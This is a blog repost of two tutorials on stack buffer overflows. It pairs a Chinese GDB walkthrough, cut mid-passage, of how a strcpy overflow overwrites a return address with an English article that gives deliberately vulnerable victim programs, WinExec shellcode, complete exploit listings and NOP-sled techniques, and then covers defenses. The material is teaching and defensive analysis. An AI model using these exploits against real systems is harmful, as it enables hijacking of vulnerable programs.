 所以可以得出, Linux x86系统在调用函数时(其实是编译器所生成的机器指令), 所传给
 被调用函数的参数是由调用函数从右到左依次入栈的.
 如现在的strcpy(buf, s), 首先是s先入栈, 然后是buf. 参数的出栈也由调用函数负责.

 0x8048416 : lea 0xfffffff4(%ebp),%eax
 0x8048419 : push %eax
 这两条指令和前面的一样, 把argv[1](即"AAAAAAAA"字串)的起始地址入栈.

 0x804841a : push $0x80484b0
 先看一下0x80484b0里面放的是什么, 虽然很明显是即将调用的printf函数的第一个参数的地址.
 (gdb) x/1s 0x80484b0
 0x80484b0 <_IO_stdin_used+4>: "String=%s\n"
 果然是.

 下面的两条指令就是调用printf函数和抛弃在栈中的两个参数了.
 0x804841f : call 0x8048330
 0x8048424 : add $0x8,%esp

 我们在0x08048427 leave 指令的前面设个断点并继续运行.
 (gdb) b *0x8048427
 Breakpoint 5 at 0x8048427
 (gdb) c
 Continuing.
 String=AAAAAAAA

 Breakpoint 5, 0x8048427 in vulFunc ()
 屏幕输出了"String=AAAAAAAA".

 这时栈帧的内容为:
 (gdb) x/15x $esp
 0xbffff6a0: 0x41414141 0x41414141 0xbffff600 0xbffff6b8
 0xbffff6b0: 0x08048443 0xbffff856 0xbffff6d8 0x400349cb
 0xbffff6c0: 0x00000002 0xbffff704 0xbffff710 0x40013868
 0xbffff6d0: 0x00000002 0x08048350 0x00000000

 进程在内存中的相关影像为:
 (内存高址)
 | ...... |
 +--------+
 |00000000|
 0xbffff6d8 +--------+ <-- 调用main函数前的ebp
 |08048350|
 +--------+
 |00000002|
 +--------+
 |40013868|
 +--------+
 |bffff710|
 +--------+
 |bffff704| argv的地址(即argv[0]的地址)
 0xbffff6c4 +--------+
 |00000002| argc的值
 0xbffff6c0 +--------+
 |400349cb|
 0xbffff6bc +--------+ <-- 调用main函数前的esp
 |bffff6d8| 调用main函数前的ebp
 0xbffff6b8 +--------+ <-- main函数的ebp
 |bffff856| 字符串"AAAAAAAA"在内存中的起始地址
 0xbffff6b4 +--------+
 |08048443| vulFunc函数的返回地址
 0xbffff6b0 +--------+ <-- 调用vulFunc函数前的esp
 |bffff6b8| main函数的ebp
 0xbffff6ac +--------+ <-- vulFunc函数的ebp
 |bffff600|
 0xbffff6a8 +--------+
 |41414141|
 0xbffff6a4 +--------+
 |41414141|
 0xbffff6a0 +--------+ <-- vulFunc的当前esp
 |bffff856| (垃圾) 字符串"AAAAAAAA"在内存中的起始地址
 0xbffff69c +--------+
 |bffff6a0| (垃圾) vulFunc函数栈帧中分配的十二个字节起始地址
 0xbffff698 +--------+
 | ...... |
 (内存低址)

 各寄存器的状况:
 (gdb) i reg
 eax 0x10 16
 ecx 0x400 1024
 edx 0x4010a980 1074833792
 ebx 0x4010c1ec 1074840044
 esp 0xbffff6a0 -1073744224
 ebp 0xbffff6ac -1073744212
 esi 0x4000ae60 1073786464
 edi 0xbffff704 -1073744124
 eip 0x8048427 134513703
 eflags 0x296 662
 (以下省略)
 ...

 请注意: 此时esp的内容为0xbffff6a0, ebp的内容为0xbffff6ac
 单步运行leave指令, 然后看一下寄存器的情况.
 (gdb) si
 0x8048428 in vulFunc ()
 (gdb) i reg
 eax 0x10 16
 ecx 0x400 1024
 edx 0x4010a980 1074833792
 ebx 0x4010c1ec 1074840044
 esp 0xbffff6b0 -1073744208
 ebp 0xbffff6b8 -1073744200
 esi 0x4000ae60 1073786464
 edi 0xbffff704 -1073744124
 eip 0x8048428 134513704
 eflags 0x396 918
 (以下省略)
 ...

 此时的esp的内容为0xbffff6b0, 即执行leave指令前的ebp内容0xbffff6ac+4;
 ebp的内容为0xbffff6b8, 这个值从那来的呢? 看一下此时进程在内存中的影像, 正好是
 vulFunc函数的ebp指向的内存的内容, 而随着这个值的出栈, esp的值正好为0xbffff6b0.

 由此可见, leave指令其实等价于
 mov %ebp,%esp
 pop %ebp
 这两条指令, 正好和刚进入被调用函数时
 push %ebp
 mov %esp,%ebp
 这两条指令的功能相反.
 也就是说leave指令抛弃了被调用函数的栈帧, 恢复了调用函数的栈帧.

 此时栈中相关的内容:
 (gdb) x/11x $esp
 0xbffff6b0: 0x08048443 0xbffff856 0xbffff6d8 0x400349cb
 0xbffff6c0: 0x00000002 0xbffff704 0xbffff710 0x40013868
 0xbffff6d0: 0x00000002 0x08048350 0x00000000

 进程在内存中的相关影像:

 (内存高址)
 | ...... |
 +--------+
 |00000000|
 0xbffff6d8 +--------+ <-- 调用main函数前的ebp
 |08048350|
 +--------+
 |00000002|
 +--------+
 |40013868|
 +--------+
 |bffff710|
 +--------+
 |bffff704| argv的地址(即argv[0]的地址)
 0xbffff6c4 +--------+
 |00000002| argc的值
 0xbffff6c0 +--------+
 |400349cb|
 0xbffff6bc +--------+ <-- 调用main函数前的esp
 |bffff6d8| 调用main函数前的ebp
 0xbffff6b8 +--------+ <-- main函数的ebp
 |bffff856| 字符串"AAAAAAAA"在内存中的起始地址
 0xbffff6b4 +--------+
 |08048443| vulFunc函数的返回地址
 0xbffff6b0 +--------+ <-- 当前esp
 |bffff6b8| (垃圾) main函数的ebp
 0xbffff6ac +--------+
 |bffff600| (垃圾)
 0xbffff6a8 +--------+
 |41414141| (垃圾)
 0xbffff6a4 +--------+
 |41414141| (垃圾)
 0xbffff6a0 +--------+
 |bffff856| (垃圾) 字符串"AAAAAAAA"在内存中的起始地址
 0xbffff69c +--------+
 |bffff6a0| (垃圾) vulFunc函数栈帧中分配的十二个字节起始地址
 0xbffff698 +--------+
 | ...... |
 (内存低址)

 继续执行下条指令: ret
 (gdb) si
 0x8048443 in main ()
 (gdb) i reg
 eax 0x10 16
 ecx 0x400 1024
 edx 0x4010a980 1074833792
 ebx 0x4010c1ec 1074840044
 esp 0xbffff6b4 -1073744204
 ebp 0xbffff6b8 -1073744200
 esi 0x4000ae60 1073786464
 edi 0xbffff704 -1073744124
 eip 0x8048443 134513731
 eflags 0x396 918
 (以下省略)
 ...

 可以看出, 从栈中弹出0x8048443(vulFunc函数调用的返回地址)给了eip.
 至此vulFunc函数调用完毕, 返回到main函数继续执行.

 值得注意的是: 如果象上面所说的, 我们输入的字串长度为二十个'A'--刚好复盖完0xbffff6b0
 所指的单元, 那么此时从栈中弹出给eip的内容将是0x41414141, 而不是0x8048443, 程序
 将跳到0x41414141去执行那里的指令, 由于0x41414141对于当前进程来说是不可访问的,
 所以导致段出错(Segmentation fault), 进程停止执行.

 这是我们的第三个焦点.

 如果我们能计算好位移(offset), 用我们准备好的代码的入口地址来覆盖0xbffff6b0所
 指的单元, 那么从栈中弹出给eip的内容就是我们的代码的入口地址, 程序将跳到我们的
 代码去继续执行.

 分析到这里, 我们已经清楚了C语言函数调用的机制了. main函数的后续指令对于我们的
 分析已无关紧要. 但是为了保持文章的完整, 我们继续再往下看看.

 此时栈的情况:
 (gdb) x/10x $esp
 0xbffff6b4: 0xbffff856 0xbffff6d8 0x400349cb 0x00000002
 0xbffff6c4: 0xbffff704 0xbffff710 0x40013868 0x00000002
 0xbffff6d4: 0x08048350 0x00000000

 进程在内存中的相关影像:

 (内存高址)
 | ...... |
 +--------+
 |00000000|
 0xbffff6d8 +--------+ <-- 调用main函数前的ebp
 |08048350|
 +--------+
 |00000002|
 +--------+
 |40013868|
 +--------+
 |bffff710|
 +--------+
 |bffff704| argv的地址(即argv[0]的地址)
 0xbffff6c4 +--------+
 |00000002| argc的值
 0xbffff6c0 +--------+
 |400349cb|
 0xbffff6bc +--------+ <-- 调用main函数前的esp
 |bffff6d8| 调用main函数前的ebp
 0xbffff6b8 +--------+ <-- main函数的ebp
 |bffff856| 字符串"AAAAAAAA"在内存中的起始地址
 0xbffff6b4 +--------+ <-- 当前esp
 |08048443| (垃圾) vulFunc函数的返回地址
 0xbffff6b0 +--------+
 |bffff6b8| (垃圾) main函数的ebp
 0xbffff6ac +--------+
 |bffff600| (垃圾)
 0xbffff6a8 +--------+
 |41414141| (垃圾)
 0xbffff6a4 +--------+
 |41414141| (垃圾)
 0xbffff6a0 +--------+
 |bffff856| (垃圾) 字符串"AAAAAAAA"在内存中的起始地址
 0xbffff69c +--------+
 |bffff6a0| (垃圾) vulFunc函数栈帧中分配的十二个字节起始地址
 0xbffff698 +--------+
 | ...... |
 (内存低址)

 再看看后续的指令做了些什么?
 0x8048443 : add $0x4,%esp ; 抛弃栈中为被调用函数准备的参数.
 0x8048446 : jmp 0x804845b ; 跳转到0x804845b继续执行
 0x8048448 : mov 0xc(%ebp),%eax ; 0x8048433 jne的条件判断跳转
 ; 入口(即argc!=2的情况)
 ; 把ebp+0xc所指向的内存单元的
 ; 内容赋给eax, 从上面的分析我
 ; 们知道里面放的是argv的地址
 0x804844b : mov (%eax),%edx ; 把eax指向的地址的内存单元里
 ; 的内容赋给edx, 我们知道argv
 ; 是个数组, argv的值就是argv[0]
 0x804844d : push %edx ; 把argv[0]入栈. 注意这里的
 ; argv[0]其实是个地址值.
 0x804844e : push $0x80484bb ; 把常数0x80484bb入栈
 ; 以上为调用printf函数准备参数.
 0x8048453 : call 0x8048330 ; 调用printf函数
 0x8048458 : add $0x8,%esp ; 抛弃为调用printf函数准备的参数
 0x804845b : leave ; 恢复调用main函数的函数的栈帧
 0x804845c : ret ; 返回到调用main函数的函数

 估计0x80484bb指向的是printf函数的format字串, 看看是不是?
 (gdb) x/1s 0x80484bb
 0x80484bb <_IO_stdin_used+15>: "Usage: %s \n"
 果然是. 那从0x8048448到0x8048458这段指令就是C语言
 printf("Usage: %s \n", argv[0]);
 的等价汇编语句了.

 我们把断点设到0x804845b, 再继续执行.
 (gdb) b *0x804845b
 Breakpoint 6 at 0x804845b
 (gdb) c
 Continuing.

 Breakpoint 6, 0x804845b in main ()

 下一条指令是leave, 应该是恢复调用函数的函数的栈帧.
 单步执行一下, 看看寄存器及栈的情况.
 (gdb) si
 0x804845c in main ()
 (gdb) i reg
 eax 0x10 16
 ecx 0x400 1024
 edx 0x4010a980 1074833792
 ebx 0x4010c1ec 1074840044
 esp 0xbffff6bc -1073744196
 ebp 0xbffff6d8 -1073744168
 esi 0x4000ae60 1073786464
 edi 0xbffff704 -1073744124
 eip 0x804845c 134513756
 eflags 0x386 902
 (以下省略)
 ...

 (gdb) x/8x $esp
 0xbffff6bc: 0x400349cb 0x00000002 0xbffff704 0xbffff710
 0xbffff6cc: 0x40013868 0x00000002 0x08048350 0x00000000

 下一条指令是ret, 我们知道栈顶放的是main函数的返回地址(0x400349cb).

 此时进程在内存中的相关影像:

 (内存高址)
 | ...... |
 +--------+
 |00000000|
 0xbffff6d8 +--------+ <-- 调用main函数前的ebp
 |08048350|
 +--------+
 |00000002|
 +--------+
 |40013868|
 +--------+
 |bffff710|
 +--------+
 |bffff704| argv的地址(即argv[0]的地址)
 0xbffff6c4 +--------+
 |00000002| argc的值
 0xbffff6c0 +--------+
 |400349cb| main函数的返回地址
 0xbffff6bc +--------+ <-- 当前esp
 |bffff6d8| (垃圾) 调用main函数前的ebp
 0xbffff6b8 +--------+
 |bffff856| (垃圾) 字符串"AAAAAAAA"在内存中的起始地址
 0xbffff6b4 +--------+
 |08048443| (垃圾) vulFunc函数的返回地址
 0xbffff6b0 +--------+
 |bffff6b8| (垃圾) main函数的ebp
 0xbffff6ac +--------+
 |bffff600| (垃圾)
 0xbffff6a8 +--------+
 |41414141| (垃圾)
 0xbffff6a4 +--------+
 |41414141| (垃圾)
 0xbffff6a0 +--------+
 |bffff856| (垃圾) 字符串"AAAAAAAA"在内存中的起始地址
 0xbffff69c +--------+
 |bffff6a0| (垃圾) vulFunc函数栈帧中分配的十二个字节起始地址
 0xbffff698 +--------+
 | ...... |
 (内存低址)

 再单步执行, 返回到调用main函数的函数
 (gdb) si
 0x400349cb in __libc_start_main (main=0x804842c

『Hacking』 Analysis of Buffer Overflow Attacks

borderj@gmail.com (Border) — Tue, 01 Apr 2008 16:09:00 +0000

Section: Articles :: Windows OS Security
Author: Maciej Ogorkiewicz & Piotr Frej

From：http://www.windowsecurity.com/articles/Analysis_of_Buffer_Overflow_Attacks.html

What causes the buffer overflow condition? Broadly speaking, buffer overflow occurs anytime the program writes more information into the buffer than the space it has allocated in the memory. This allows an attacker to overwrite data that controls the program execution path and hijack the control of the program to execute the attacker's code instead the process code. For those who are curious to see how this works, we will now attempt to examine in more detail the mechanism of this attack and also to outline certain preventive measures.

From experience we know that many have heard about these attacks, but few really understand the mechanics of them. Others have a vague idea or none at all of what an overflow buffer attack is. There also those who consider this problem to fall under a category of secret wisdom and skills available only to a narrow segment of specialists. However this is nothing except for a vulnerability problem brought about by careless programmers.

Programs written in C language, where more focus is given to the programming efficiency and code length than to the security aspect, are most susceptible to this type of attack. In fact, in programming terms, C language is considered to be very flexible and powerful, but it seems that although this tool is an asset it may become a headache for many novice programmers. It is enough to mention a pointer-based call by direct memory reference mode or a text string approach. This latter implies a situation that even among library functions working on text strings, there are indeed those that cannot control the length of the real buffer thereby becoming susceptible to an overflow of the declared length.

Before attempting any further analysis of the mechanism by which the attack progresses, let us develop a familiarity with some technical aspects regarding program execution and memory management functions.

Process Memory

When a program is executed, its various compilation units are mapped in memory in a well-structured manner. Fig. 1 represents the memory layout.

Fig. 1: Memory arrangement

Legend:

The text segment contains primarily the program code, i.e., a series of executable program instructions. The next segment is an area of memory containing both initialized and uninitialized global data. Its size is provided at compilation time. Going further into the memory structure toward higher addresses, we have a portion shared by the stack and heap that, in turn, are allocated at run time. The stack is used to store function call-by arguments, local variables and values of selected registers allowing it to retrieve the program state. The heap holds dynamic variables. To allocate memory, the heap uses the malloc function or the new operator.

What is the stack used for?

The stack works according to a LIFO model (Last In First Out). Since the spaces within the stack are allocated for the lifetime of a function, only data that is active during this lifetime can reside there. Only this type of structure results from the essence of a structural approach to programming, where the code is split into many code sections called functions or procedures. When a program runs in memory, it sequentially calls each individual procedure, very often taking one from another, thereby producing a multi-level chain of calls. Upon completion of a procedure it is required for the program to continue execution by processing the instruction immediately following the CALL instruction. In addition, because the calling function has not been terminated, all its local variables, parameters and execution status require to be "frozen" to allow the remainder of the program to resume execution immediately after the call. The implementation of such a stack will guarantee that the behavior described here is exactly the same.

Function calls

The program works by sequentially executing CPU instructions. For this purpose the CPU has the Extended Instruction Counter (EIP register) to maintain the sequence order. It controls the execution of the program, indicating the address of the next instruction to be executed. For example, running a jump or calling a function causes the said register to be appropriately modified. Suppose that the EIP calls itself at the address of its own code section and proceeds with execution. What will happen then?

When a procedure is called, the return address for function call, which the program needs to resume execution, is put into the stack. Looking at it from the attacker's point of view, this is a situation of key importance. If the attacker somehow managed to overwrite the return address stored on the stack, upon termination of the procedure, it would be loaded into the EIP register, potentially allowing any overflow code to be executed instead of the process code resulting from the normal behavior of the program. We may see how the stack behaves after the code of Listing 1 has been executed.

Listing1

void f(int a, int b)

{

char buf[10];

// <-- the stack is watched here

}

void main()

{

f(1, 2);

}

After the function f() is entered, the stack looks like the illustration in Figure 2.

Fig. 2 Behavior of the stack during execution of a code from Listing 1

Legend:

Firstly, the function arguments are pushed backwards in the stack (in accordance with the C language rules), followed by the return address. From now on, the function f() takes the return address to exploit it. f() pushes the current EBP content (EBP will be discussed further below) and then allocates a portion of the stack to its local variables. Two things are worth noticing. Firstly, the stack grows downwards in memory as it gets bigger. It is important to remember, because a statement like this:

sub esp, 08h

That causes the stack to grow, may seem confusing. In fact, the bigger the ESP, the smaller the stack size and vice versa. An apparent paradox.

Secondly, whole 32-bit words are pushed onto the stack. Hence, a 10-character array occupies really three full words, i.e. 12 bytes.

How does the stack operate?

There are two CPU registers that are of "vital" importance for the functioning of the stack which hold information that is necessary when calling data residing in the memory. Their names are ESP and EBP. The ESP (Stack Pointer) holds the top stack address. ESP is modifiable and can be modified either directly or indirectly. Directly – since direct operations are executable here, for example, add esp, 08h. This causes shrinking of the stack by 8 bytes (2 words). Indirectly – by adding/removing data elements to/from the stack with each successive PUSH or POP stack operation. The EBP register is a basic (static) register that points to the stack bottom. More precisely it contains the address of the stack bottom as an offset relative to the executed procedure. Each time a new procedure is called, the old value of EBP is the first to be pushed onto the stack and then the new value of ESP is moved to EBP. This new value of ESP held by EBP becomes the reference base to local variables that are needed to retrieve the stack section allocated for function call {1}.

Since ESP points to the top of the stack, it gets changed frequently during the execution of a program, and having it as an offset reference register is very cumbersome. That is why EBP is employed in this role.

The threat

How to recognize where an attack may occur? We just know that the return address is stored on the stack. Also, data is handled in the stack. Later we will learn what happens to the return address if we consider a combination, under certain circumstances, of both facts. With this in mind, let us try with this simple application example using Listing 2.

Listing 2

#include

char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes

void main()

{

char buf[8];

strcpy(buf, code);

}

When executed, the above application returns an access violation {2}. Why? Because an attempt was made to fit a 16-character string into an 8–byte space (it is fairly possible since no checking of limits is carried out). Thus, the allocated memory space has been exceeded and the data at the stack bottom is overwritten. Let us look once again at Figure 2. Such critical data as both the frame address and the return address get overwritten (!). Therefore, upon returning from the function, a modified return address has been pushed into EIP, thereby allowing the program to proceed with the address pointed to by this value, thus creating the stack execution error. So, corrupting the return address on the stack is not only feasible, but also trivial if "enhanced" by programming errors.

Poor programming practices and bugged software provide a huge opportunity for a potential attacker to execute malicious code designed by him.

Stack overrun

We must now sort all the information. As we already know, the program uses the EIP register to control execution. We also know that upon calling a function, the address of the instruction immediately following the call instruction is pushed onto the stack and then popped from there and moved to EIP when a return is performed. We may ascertain that the saved EIP can be modified when being pushed onto the stack, by overwriting the buffer in a controlled manner. Thus, an attacker has all the information to point his own code and get it executed, creating a thread in the victim process.

Roughly, the algorithm to effectively overrun the buffer is as follows:

1. Discovering a code, which is vulnerable to a buffer overflow.

2. Determining the number of bytes to be long enough to overwrite the return address.

3. Calculating the address to point the alternate code.

4. Writing the code to be executed.

5. Linking everything together and testing .

The following Listing 3 is an example of a victim's code.

Listing 3 – The victim's code

#include

#define BUF_LEN 40

void main(int argc, char **argv)

{

char buf[BUF_LEN];

if (argv > 1)

{

printf(„\buffer length: %d\nparameter length: %d", BUF_LEN, strlen(argv[1]) );

strcpy(buf, argv[1]);

}

This sample code has all the characteristics to indicate a potential buffer overflow vulnerability: a local buffer and an unsafe function that writes to memory, the value of the first instruction line parameter with no bounds checking employed.

Putting to use our newfound knowledge, let us accomplish a sample hacker's task. As we ascertained earlier, guessing a code section potentially vulnerable to buffer overflow seems simple. The use of a source code (if available) may be helpful otherwise we can just look for something critical in the program to overwrite it. The first approach will focus on searching for string-based function like strcpy(), strcat() or gets(). Their common feature is that they do not use unbounded copy operations, i.e. they copy as many as possible until a NULL byte is found (code 0). If, in addition, these functions operate on a local buffer and there is the possibility to redirect the process execution flow to anywhere we want, we will be successful in accomplishing an attack. Another approach would be trial and error, by relying on stuffing an inconsistently large batch of data inside any available space. Consider now the following example:

victim.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

If the program returns an access violation error, we may simply move on to step 2.

The problem now, is to construct a large string with overflow potential to effectively overwrite the return address. This step is also very easy. Remembering that only whole words can be pushed onto the stack, we simply need to construct the following string:

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUU.............

If successful, in terms of potential buffer overflow, this string will cause the program to fail with the well-known error message:

The instruction at „0x4b4b4b4b" referenced memory at „0x4b4b4b4b". The memory could not be „read"

The only conclusion to be drawn is that since the value 0x4b is the letter capital "K" in ASCII code, the return address has been overwritten with „KKKK". Therefore, we can proceed to Step 3.Finding the buffer beginning address in memory (and the injected shellcode) will not be easy. Several methods can be used to make this "guessing" more efficient, one of which we will discuss now, while the others will be explained later. In the meanwhile we need to get the necessary address by simply tracing the code. After starting the debugger and loading the victim program, we will attempt to proceed. The initial concern is to get through a series of system function calls that are irrelevant from this task point of view. A good method is to trace the stack at runtime until the input string characters appear successively. Perhaps two or more approaches will be required to find a code similar to that provided below:

:00401045 8A08 mov cl, byte ptr [eax]

:00401047 880C02 mov byte ptr [edx+eax], cl

:0040104A 40 inc eax

:0040104B 84C9 test cl, cl

:0040104D 75F6 jne 00401045

This is the strcpy function we are looking for. On entry to the function, the memory location pointed by EAX is read in order to move (next line) its value into memory location, pointed by the sum of the registers EAX and EDX. By reading the content of these registers during the first iteration we can determine that the buffer is located at 0x0012fec0.

Writing a shellcode is an art itself. Since operating systems use different system function calls, an individual approach is needed, depending on the OS environment under which the code must run and the goal it is being aimed at. In the simplest case, nothing needs to be done, since just overwriting the return address causes the program to deviate from its expected behavior and fail. In fact, due to the nature of buffer overflow flaws associated with the possibility that the attacker can execute arbitrary code, it is possible to develop a range of different activities constrained only by available space (although this problem can also be circumvented) and access privileges. In most cases, buffer overflow is a way for an attacker to gain "super user" privileges on the system or to use a vulnerable system to launch a Denial of Service attack. Let us try, for example, to create a shellcode allowing commands (interpreter cmd.exe in WinNT/2000). This can be attained by using standard API functions: WinExec or CreateProcess. When WinExec is called, the process will look like this:

WinExec(command, state)

In terms of the activities that are necessary from our point of view, the following steps must be carried out:

- pushing the command to run onto the stack. It will be „cmd /c calc".

- pushing the second parameter of WinExec onto the stack. We assume it to be zero in this script.

- pushing the address of the command „cmd /c calc".

- calling WinExec.

There are many ways to accomplish this task and the snippet below is only one of possible tricks:

sub esp, 28h ; 3 bytes

jmp call ; 2 bytes

par:

call WinExec ; 5 bytes

push eax ; 1 byte

call ExitProcess ; 5 bytes

calling:

xor eax, eax ; 2 bytes

push eax ; 1 byte

call par ; 5 bytes

.string cmd /c calc|| ; 13 bytes

Some comments on this:

sub esp, 28h

This instruction adds some room to the stack. Since the procedure containing an overflow buffer had been completed, consequently, the stack space allocated for local variables is now declared as unused due to the change in ESP. This has the effect that any function call which is given from the code level is likely to overwrite our arduously constructed code inserted in the buffer. To have a function callee-save, all we need is to restore the stack pointer to what it was before "garbage", that is to its original value (40 bytes) thereby assuring that our data will not be overwritten.

jmp call

The next instruction jumps to the location where the WinExec function arguments are pushed onto the stack. Some attention must be paid to this. Firstly, a NULL value is required to be "elaborated" and placed onto the stack. Such a function argument cannot be taken directly from the code otherwise it will be interpreted as null terminating the string that has only been partially copied. In the next step, we need a way of pointing the address of the command to run and we will make this in a somewhat ad hoc manner. As we may remember, each time a function is called, the address following the call instruction is placed onto the stack. Our successful (hopefully) exploit first overwrites the saved return address with the address of the function we wish to call. Notice that the address for the string may appear somewhere in the memory. Subsequently, WinExec followed by ExitProcess will be run. As we already know, CALL represents an offset that moves the stack pointer up to the address of the function following the callee. And now we need to compute this offset. Fig. 3 below shows a structure of a shellcode to accomplish this task.

Fig. 3 A sample shellcode

Legend:

As can be seen, our example does not consider our reference point, the EBP, that needs to be pushed onto the stack. This is due to an assumption that the victim program is a VC++ 7 compiled code with its default settings that skip the said operation. The remaining job around this problem is to have the code pieces put together and test the whole. The above shellcode, incorporated in a C program and being more suitable for the CPU is presented in Listing 4.

Listing 4 – Exploit of a program victim.exe

#include

char *victim = "victim.exe";

char *code = "\x90\x90\x90\x83\xec\x28\xeb\x0b\xe8\xe2\xa8\xd6\x77\x50\xe8\xc1\x90\xd6\x77\x33\xc0\x50\xe8\xed\xff\xff\xff";

char *oper = "cmd /c calc||";

char *rets = "\xc0\xfe\x12";

char par[42];

void main()

{

strncat(par, code, 28);

strncat(par, oper, 14);

strncat(par, rets, 4);

char *buf;

buf = (char*)malloc( strlen(victim) + strlen(par) + 4);

if (!buf)

{

printf("Error malloc");

return;

}

wsprintf(buf, "%s \"%s\"", victim, par);

printf("Calling: %s", buf);

WinExec(buf, 0);

}

Ooops, it works! The only requisite is that the current directory has a compiled file victim.exe from Listing 3. If all goes as expected, we will see a window with a well-known System Calculator.

Stock-based and non-stack based exploits

In the previous example we presented an own code that is executable once the control over the program has been taken over. However, such an approach may not be applicable, when a „victim" is able to check that no illegal code on the stack is executed, otherwise the program will be stopped. Increasingly, so called non-stack based exploits are being used. The idea is to directly call the system function by overwriting (nothing new!) the return address using, for example, WinExec. The only remaining problem is to push the parameters used by the function onto the stack in a useable state. So, the exploit structure will be like in Figure 4.

Fig. 4 A non-stack based exploit

Legend:

A non-stack-based exploit requires no instruction in the buffer but only the calling parameters of the function WinExec. Because a command terminated with a NULL character cannot be handled, we will use a character '|'. It is used to link multiple commands in a single command line. This way each successive command will be executed only if the execution of a previous command has failed. The above step is indispensable for terminating the command to run without having executed the padding. Next to the padding which is only used to fill the buffer, we will place the return address (ret) to overwrite the current address with that of WinExec. Furthermore, pushing a dummy return address onto it (R) must ensure a suitable stack size. Since WinExec function accepts any DWORD values for a mode of display, it is possible to let it use whatever is currently on the stack. Thus, only one of two parameters remains to terminate the string.

In order to test this approach, it is necessary to have the victim's program. It will be very similar to the previous one but with a buffer which is considerably larger (why? We will explain later). This program is called victim2.exe and is presented as Listing 5.

Listing 5 – A victim of a non-stack based exploit attack

#include

#define BUF_LEN 1024

void main(int argc, char **argv)

{

char buf[BUF_LEN];

if (argv > 1)

{

printf(„\nBuffer length: %d\nParameter length: %d", BUF_LEN, strlen(argv[1]) );

strcpy(buf, argv[1]);

}

To exploit this program we need a piece given in Listing 6.

Listing 6 – Exploit of the program victim2.exe

#include

char* code = "victim2.exe \"cmd /c calc||AAAAA...AAAAA\xaf\xa7\xe9\x77\x90\x90\x90\x90\xe8\xfa\x12\"";

void main()

{

WinExec( code, 0 );

}

For simplicity's sake, a portion of „A" characters from inside the string has been deleted. The sum of all characters in our program should be 1011.

When the WinExec function returns, the program makes a jump to the dummy saved return address and will consequently quit working. It will then return the function call error but by that time the command should already be performing its purpose.

Given this buffer size, one may ask why it is so large whereas the "malicious" code has become relatively smaller? Notice that with this procedure, we overwrite the return address upon termination of the task. This implies that the stack top restores the original size thus leaving a free space for its local variables. This, in turn, causes the space for our code (a local buffer, in fact) to become a room for a sequence of procedures. The latter can use the allocated space in an arbitrary manner, most likely by overwriting the saved data. This means that there is no way to move the stack pointer manually, as we cannot execute any own code from there. For example, the function WinExec that is called just at the beginning of the process, occupies 84 bytes of the stack and calls subsequent functions that also place their data onto the stack. We need to have such a large buffer to prevent our data from destruction. Figure 5 illustrates this methodology.

Fig. 5 A sample non-stack based exploit: stack usage

Legend:

This is just one of possible solutions that has many alternatives to consider. First of all, it is easy to compile because it is not necessary to create an own shellcode. It is also immune to protections that use monitoring libraries for capturing illegal codes on the stack.

System function calling

Notice, that all previously discussed system function callings employ a jump command to point to a pre-determined fixed address in memory. This determines the static behavior of the code which implies that we agree to have our code non transferable across various Windows operating environments. Why? Our intention is to suggest a problem associated with the fact that various Windows OSes use different user and kernel addresses. Therefore, the kernel base address differs and so do the system function addresses. For details, see Table 1.

Table 1. Kernel addresses vs. OS environment

Windows Platform

Kernel Base Address

Win95

0xBFF70000

Win98

0xBFF70000

WinME

0xBFF60000

WinNT (Service Pack 4 and 5)

0x77F00000

Win2000

0x77F00000

To prove it, simply run our example under operating an system other than Windows NT/2000/XP.

What remedy would be appropriate? The key is to dynamically fetch function addresses, at the cost of a considerable increase in the code length. It turns out that it is sufficient to find where two useful system functions are located, namely GetProcAddress and LoadLibraryA, and use them to get any other function address returned. For more details, see references, particularly the Kungfoo project developed by Harmony [6].

Other ways of defining the beginning of the buffer

All previously mentioned examples used Debugger to establish the beginning of the buffer. The problem lies in the fact that we wanted to establish this address very precisely. Generally, it is not a necessary requirement. If, assuming that the beginning of an alternate code is placed somewhere in the middle of the buffer and not at the buffer beginning whereas the space after the code is filled with many identical jump addresses, the return address will surely be overwritten as required. On the other hand, if we fill the buffer with a series of 0x90s till the code beginning, our chance to guess the saved return address will grow considerably. So, the buffer will be filled as illustrated in Figure 6.

Fig. 6 Using NOPs during an overflow attack

Legend:

The 0x90 code corresponds to a NOP slide that does literally nothing. If we point at any NOP, the program will slide it and consequently it will go to the shellcode beginning. This is the trick to avoid a cumbersome search for the precise address of the beginning of the buffer.

Where does the risk lie?

Poor programming practices and software bugs are undoubtedly a risk factor. Typically, programs that use text string functions with their lack of automatic detection of NULL pointers. The standard C/C++ libraries are filled with a handful of such dangerous functions. There are: strcpy(), strcat(), sprintf(), gets(), scanf(). If their target string is a fixed size buffer, a buffer overflow can occur when reading input from the user into such a buffer.

Another commonly encountered method is using a loop to copy single characters from either the user or a file. If the loop exit condition contains the occurrence of a character, this means that the situation will be the same as above.

Preventing buffer overflow attacks

The most straightforward and effective solution to the buffer overflow problem is to employ secure coding. On the market there are several commercial or free solutions available which effectively stop most buffer overflow attacks. The two approaches here are commonly employed:

- library-based defenses that use re-implemented unsafe functions and ensure that these functions can never exceed the buffer size. An example is the Libsafe project.

- library-based defenses that detect any attempt to run illegitimate code on the stack. If the stack smashing attack has been attempted, the program responds by emitting an alert. This is a solution implemented in the SecureStack developed by SecureWave.

Another prevention technique is to use compiler-based runtime boundaries, checking what recently became available and hopefully with time, the buffer overflow problem will end up being a major headache for system administrators. While no security measure is perfect, avoiding programming errors is always the best solution.

Summary

Of course, there are plenty of interesting buffer overflow issues which have not been discussed. Our intention was to demonstrate a concept and bring forth certain problems. We hope that this paper will be a contribution to the improvement of the software development process quality through better understanding of the threat, and hence, providing better security to all of us.

References

The links listed below form a small part of a huge number of references available on the World Wide Web.

[1] Aleph One, Smashing The Stack For Fun and Profit, Phrack Magazine nr 49, http://www.phrack.org/show.php?p=49&a=14
[2] P. Fayolle, V. Glaume, A Buffer Overflow Study, Attacks & Defenses, http://www.enseirb.fr/~glaume/indexen.html
[3] I. Simon, A Comparative Analysis of Methods of Defense against Buffer Overflow Attacks, http://www.mcs.csuhayward.edu/~simon/security/boflo.html
[4] Bulba and Kil3r, Bypassing StackGuard and Stackshield, Phrack Magazine 56 No 5, http://phrack.infonexus.com/search.phtml?view&article=p56-5
[5] many interesting papers on Buffer Overflow and not only: http://www.nextgenss.com/research.html#papers
